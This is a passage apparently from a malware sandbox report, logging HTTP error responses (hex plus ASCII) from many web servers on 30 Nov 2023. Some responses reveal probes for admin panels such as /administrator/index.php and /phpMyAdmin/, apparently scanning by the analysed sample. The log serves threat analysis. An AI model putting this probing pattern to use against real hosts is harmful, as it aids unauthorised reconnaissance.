68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:21:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:21:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:21:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:21:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:21:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:21:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:21:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:21:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:21:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:21:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:21:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:21:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:21:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:22:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:22:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 30 Nov 2023 10:22:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-17.ec2.internalX-Request-Id: cbfa7b29-d36d-4e3d-a486-e160b8eb28b4Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:37 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-117.ec2.internalX-Request-Id: 48c66a3e-843d-4c48-a760-4b24559a1e4cData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 30 Nov 2023 10:22:38 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-67.ec2.internalX-Request-Id: 86494be6-38af-45f9-83b7-f80f57bfb9d8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-242.ec2.internalX-Request-Id: 55733347-539b-4bac-ae03-f55e7f017fb7Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:39 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 221Connection: keep-aliveServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /administrator/index.php was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-137.ec2.internalX-Request-Id: 243215cb-10f2-42fb-b850-8db3c87e399cData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 209Connection: keep-aliveServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-88.ec2.internalX-Request-Id: eaea994f-aff0-44a9-a750-2b5502b757f0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-117.ec2.internalX-Request-Id: 9363dae1-86d2-4b3d-aef7-c10e6186599bData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-67.ec2.internalX-Request-Id: 78b078c1-1715-4913-ae66-6ee25284566aData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 30 Nov 2023 10:22:41 GMTContent-Type: text/htmlContent-Length: 12245Connection: keep-aliveServer: ApacheETag: "63366736-2fd5"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 209Connection: keep-aliveServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpMyAdmin/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-17.ec2.internalX-Request-Id: 86aa2d4c-8baf-4e4a-967d-5b00fc002a54Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-181.ec2.internalX-Request-Id: c178c8ba-afae-4204-8e76-dadcee4d9b29Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 30 Nov 2023 10:22:41 GMTContent-Type: text/htmlContent-Length: 12245Connection: keep-aliveServer: ApacheETag: "63366736-2fd5"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:42 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 209Connection: keep-aliveServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /PhpMyAdmin/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-167.ec2.internalX-Request-Id: e833e0d5-1606-4105-ae9c-d86ac7e7f18eData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-181.ec2.internalX-Request-Id: 415b3117-498e-4065-8502-9bef07de228cData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
